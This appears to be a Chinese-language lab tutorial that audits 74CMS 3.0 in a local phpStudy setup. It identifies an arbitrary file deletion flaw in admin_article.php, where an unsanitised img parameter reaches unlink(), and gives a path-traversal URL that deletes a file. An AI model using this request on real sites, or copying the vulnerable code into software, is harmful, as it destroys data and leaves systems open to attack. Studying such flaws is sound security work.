一、 启动环境
1.双击运行桌面phpstudy.exe软件
2.点击启动按钮,启动服务器环境
二、代码审计
1.双击启动桌面Seay源代码审计系统软件
2.因为74CMS3.0源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK
3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\74cms),点击确定
漏洞分析
1.点击展开左侧admin目录,在弹出的下拉列表中双击admin/admin_article.php页面,右侧页面可以看到相关代码。
elseif($act == 'del_img')
{
$id=intval($_GET['id']);
$img=$_GET['img'];
$sql="update ".table('article')." set Small_img='' where id=".$id." LIMIT 1";
$db->query($sql);
@unlink($upfiles_dir."/".$img);
@unlink($thumb_dir.$img);
adminmsg("删除缩略图成功!",2);
}
当act参数为del_img的时候会进入删除文件流程。 2.程序首先获取GET传输过来的ID,在获取GET传输过来的img图像,然后进入数据库查询ID,这部分对于漏洞利用并无影响。 3.最后调用unlink删除$img所存在的文件
漏洞利用
1. 首先访问admin/admin_article.php?act=del_img,紧接着在后面跟上要删除目录和文件。
http://192.168.91.136/74cms_Home_Setup_v3.0.0/upload/admin/admin_article.php?act=del_img&img=../../1.txt
执行前:
执行后: